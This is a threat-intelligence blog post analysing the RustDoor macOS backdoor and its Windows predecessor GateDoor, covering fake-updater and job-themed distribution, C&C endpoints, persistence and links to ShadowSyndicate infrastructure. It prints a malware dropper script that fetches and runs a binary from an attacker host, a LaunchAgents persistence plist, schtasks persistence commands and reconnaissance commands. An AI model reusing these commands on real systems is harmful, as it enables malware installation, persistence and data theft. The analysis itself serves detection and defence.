S2W
Follow
Published in
S2W BLOG
13 min read
Feb 19, 2024
—
S2W
Follow
Feb 19, 2024
—
Author: Minyeop Choi, Sojun Ryu, Sebin Lee, HuiSeong Yang | BLKSMTH
Last Modified : Feb 19, 2024
Recently, a lot of malware targeting macOS users has been discovered. ZuRu malware variant and macOS.Bkdr.Activator, which were distributed in pirated macOS applications are such cases.
On this background, attackers’ use of Golang and Rust, which support cross-platforms, is increasing, and the possibility of writing code more efficiently by utilizing AI technologies such as chatGPT and Copilot when developing malware has undoubtedly increased. It is also worth noting that attackers are putting a lot of effort into attacking the macOS environment as the number of MacBook users has increased since the introduction of Apple’s silicon chip. So, malware targeting macOS does malicious acts such as stealing information stored in macOS or secretly using device resources.
In December 2023, Talon, the threat research center in S2W, discovered that macOS malware named RustDoor (a reference to the name from BitDefender) disguised as a VisualStudio update is being distributed. At the time of discovery, not a single one was detected as malicious based on VirusTotal, which shows that malicious macOS target binaries written in Rust are more difficult to detect than Windows in current security products. This report covers a detailed analysis of the identified RustDoor malware and introduces Windows-targeting malware identified as the predecessor of RustDoor.
We have identified the following key characteristics after tracking RustDoor malware over the past 3 months. S2W internally named the malware family GateDoor, but to distinguish it from BitDefender’s RustDoor, the macOS version will be called RustDoor, and the Windows malware version will be called GateDoor.
The initial version of RustDoor is believed to have been produced based on Golang for the Windows environment and was developed at least before the end of September 2023. Afterward, the attacker targeted macOS and developed malware based on Rust, and it is believed that preparations for the attack were completed at least in December 2023. It is expected that the attacker developed the malware in Golang and Rust, with various environments in mind from the early stages of malware development. Additionally, it is expected that during this process, it was produced in Golang and then changed to Rust, which is more difficult to analyze. The macOS version of RustDoor targets Silicon MacBooks. Among the hunted RustDoor files, many file names start with localfile~ because each ARM and Intel binary in one RustDoor binary was separated and submitted to VirusTotal.
(Silicon binaries include binaries for both ARM and Intel versions.)
RustDoor is disguised as a normal update program, as it is distributed under file names such as VisualStudioUpdater and ChromeUpdates.
In addition to file names, some specific words were used in distribution sites and C&C servers. In particular, keywords such as “Mac,” “iCloud,” and “Apple” related to Apple were used as the address of the C&C server.
It was confirmed that the GateDoor was distributed disguised as a normal WebViewHost utility. At the time, since it was distributed to Windows, general keywords were used in the domain address.
GateDoor and RustDoor seem to be distributed by encouraging people to download utilities or fake normal update programs through distribution sites disguised as normal. However, it has also been found that RustDoor was distributed under the guise of a job search theme.
GateDoor
GateDoor was distributed disguised as a utility called WebViewHost. The attacker distributed the legitimate WebViewHost utility in the form of a ZIP file or MSI file, and by applying the DLL Search Order Hijacking technique when the user runs the WebViewHost.exe file, the malicious WebView2Loader.dll file is loaded. After that, the DLL file downloads and executes the GateDoor malware from an external server. As confirmed, the edging.zip file was used in late September, and the BinMS.msi file was used in early November 2023. In the case of MSI files, files are created in the path below when executed.
The GateDoor Downloader contains the following config values, and these values are encrypted with a specific XOR key value (“nfmMoPCj”).
— GateDoor download base URL
— GateDoor download URL path
— File name saved locally after downloading
— HKEY_CURRENT_USERActivateS sub registry key value (MicrosoftEdging)
In addition, the distribution method via MSI files discovered in early November 2023 included the MSI file, GateDoor Downloader, and GateDoor malware signed with a valid certificate.
RustDoor — Job search theme
In one case, it was found that RustDoor malware was distributed disguised as a job-related file. A shell script file that downloads RustDoor and normal document files was distributed with the file name Jobinfo.app.zip, and when the script file is executed, RustDoor malware is executed with the file name Previewers.
| Table 3. Content of the shell script
#!/bin/sh
cd /tmp
curl -O -s https://turkishfurniture.blog/job.pdf
open job.pdf
cd "/Users/$(whoami)/"
curl -O -s https://turkishfurniture.blog/Previewers
chmod +x Previewers
./Previewers
Among the attacker infrastructure, trendfilesalgol[.]com, confirmed to be the C&C server for the earliest GateDoor malware, was first assigned a Russian IP and finally a Romanian IP address of 192.29.13[.]152.
desktop365metrics[.]com, used as a distribution site for GateDoor, has been used since August 23, 2023, and is hosted on Digital Ocean.
Later, 193.29.13[.]167, the earliest C&C among RustDoor’s C&C servers, was confirmed to be a Romanian IP. The maconlineoffice[.]com domain, one of the C&C domains, is also connected to the corresponding IP. From then on, hosting servers in Germany, the United States, Brazil, and Singapore were used.
The attacker initially built infrastructure through hosting companies in Eastern Europe, such as Russia and Romania. In particular, the Romanian IP (193.29.13.152) was used as a C&C server and domain registration site. When distributing malware, they avoided using IPs, created domains, and used various hosting servers worldwide. In this respect, there is a possibility that the attacker is geopolitically located in Eastern Europe.
This chapter provides a detailed analysis of the RustDoor malware. This file is malware written in Rust, targets macOS, and can attack both Intel and Apple Silicon chipsets.
In the case of the early version of RustDoor, no separate configuration information exists internally. The early version of RustDoor registers malware in the macOS startup program by creating a new plist in the /Library/LaunchAgents path to maintain persistence.
| Table 7. Content of the plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.apple.visualstudio</string>
<key>Program</key>
<string>{Path to RustDoor}</string>
<key>KeepAlive</key>
<dict>
<key>SuccessfulExit</key>
<false/>
</dict>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>
RustDoor v2, later updated, stores configuration information in JSON format within the malware to support various persistence methods depending on the situation. RustDoor reads the value immediately after execution and determines how to maintain persistence for each field.
| Table 8. Configuration in RustDoor
{
"daemonize": true,
"check_cron_asked": true,
"lock_in_cron": true,
"lock_in_dock": true,
"lock_in_launch": false,
"copy_files": true,
"apps": [ { "id": 1,
"name": "Firefox",
"path": "/Applications/Firefox.app/",
"icon": "/Applications/Firefox.app/Contents/Resources/firefox.icns",
"exec": "firefox",
"show_dialog": false,
"dialog_title": "title"
}, …
The setting values that confirm the function in the above settings are as follows.
RustDoor transmits information about the infected device to the C&C server through an HTTP POST request and receives the client’s unique ID from the server. The URL used here is [Base C2 URL]/gateway/register and the data below is delivered in JSON format.
Only a number is received as a response value without any other format; that number is the client ID given to the infected device.
RustDoor periodically requests commands from the C&C server every second. Command requests are made to [Base C2 URL]/gateway/report and the assigned client ID is delivered in JSON format.
The C&C server delivers the following data to RustDoor, which includes a command to be executed. RustDoor performs tasks corresponding to the name and is managed by assigning it to the ID.
The list of commands and additional data required are as follows.
In the case of the “upload” command, only files from a specific path on the C&C server can be downloaded. This is done by downloading the file as a ZIP file and decompressing it to the work path.
In the case of the “download” command, the specified file is compressed into a temp.zip file and sent to the [Base C2 URL]/tasks/upload_file path.
When the task is completed, or the command result needs to be transmitted, RustDoor delivers the following data to [Base C2 URL]/gateway/task.
GateDoor, designed to target the Windows operating system with endpoints and protocols similar to RustDoor, was additionally identified. The malware is written in Golang and is focused on executing arbitrary code or executable files in various ways.
GateDoor supports 3 of the 4 endpoints used by RustDoor, and future_task, a separate endpoint used only by GateDoor, has been additionally confirmed.
Additionally, both GateDoor and RustDoor’s C&C servers are built with the Django REST Framework, so they return the same error message.
Because GateDoor targets the Windows operating system, the information when registering a device infected with malware differs from RustDoor.
In the case of GateDoor, the client ID and a list of commands to be immediately executed are transmitted. The result of the command received with future is sent to the gateway/future_task endpoint.
Afterward, the malware executes features to maintain persistence. GateDoor implements various methods to maintain persistence, but internal fixed values determine the method.
Note that the installation path of legitimate EXE file that loads the GateDoor downloader is C:Users[username]AppDataRoamingMicrosoftEdgingWebViewHost.exe.
3. Utilize schtasks.exe
— schtasks.exe /Create /SC ONLOGON /F /TN MicrosoftEdging /TR [The EXE path]
— schtask.exe /Create /SC onidle /F /TN MicrosoftEdging /TR [The EXE path] /i 30
The command request through the gateway/report endpoint is the same, but the response value has an added field called exe_param, which is an argument required for file execution in addition to the argument for the command.
Unlike RustDoor, the commands supported by GateDoor support various features for executing arbitrary commands or additional files. RustDoor can be viewed as malware specialized in backdoor functions, while GateDoor is malware specialized in backdoor and loader functions.
Additional malware was identified that communicated with the sarkerrentacars[.]com domain. It is equally written in Golang and uses the internal name DataCollector. DataCollector has commands to collect information on infected devices targeting Intel macOS devices and sending the output results to the command attacker’s server using the GET method. The commands that DataCollector executes to collect data are as follows. As a result, the stolen information includes system information, network information, software information, hardware information, registered daemon list, kernel parameter list, and disk information.
| Table 20. List of commands that DataCollector executes
system_profiler SPSoftwareDataType SPHardwareDataType
networksetup -listallnetworkservices
networksetup -listallhardwareports
launchctl list
sysctl -a
diskutil list
In September 2023, Group-IB unveiled a new RaaS (Ransomware-as-a-Service) Affiliate called ShadowSyndicate. They identified 85 servers using the same SSH Fingerprint key from July 16, 2022, to September 2023, and these servers were used as C&C servers for malware such as Cobalt Strike, IcedID, and Sliver. Since these servers have been identified to be related to 7 ransomware groups, it is presumed that the group is an affiliate collaborating with several RaaS groups.
While tracking the infrastructure of the RustDoor malware, we found a correlation between the IP of the C&C server (193.29.13[.]167, 88.214.26[.]22) and ShadowSyndicate. As a result of pivoting the SSH Fingerprint key released by Group-IB, the 193.29.13[.]167 IP was discovered. Since the Issuer & JARM of the SSL certificate used by 193.29.13[.]167 and 88.214.26[.]22 are the same, the infrastructure is also suspected of being related to ShadowSyndicate. This information was already made known on X by Chris Duggan.
We additionally traced the infrastructure of the GateDoor malware we identified. In this process, we discovered that many servers used the same SSH Fingerprint value as the IP(193.29.13[.]152) assigned to the C&C server domain (trendfilesalgol[.]com). As a result of investigating the servers, they were used as C&C servers for various malware such as Cobalt Strike, StealC, and TrueBot, and the watermark of Coblat Strike Beacon was the same as that mentioned by Group-IB. Among these, the watermark used by Clop (1580103824) and the Watermark used by ALPHV and Nokoyawa (674054486) were identified.
It was also confirmed that many IPs (81.19.135[.]215, etc.) were mentioned among the additionally confirmed servers in the Medium content released by Joshuapenny.
Given that the above infrastructures are heavily linked to cybercriminals such as RaaS, we estimate that cybercriminals, not the APT group, are behind this malware. As previously disclosed by Chris Duggan, there is a connection with the ShadowSyndicate threat actor. This is supported by the fact that the method of distributing malware and the features of the malware are not yet sophisticated and that it is different from existing APT groups. However, given that the infrastructure identified as ShadowSyndicate is very extensive and many cyber-criminals are connected, we should consider the possibility of a cybercrime collaborator specializing in providing infrastructure.
in
—
in
—
in
—
in
—
in
—
—
in
—
—
—
—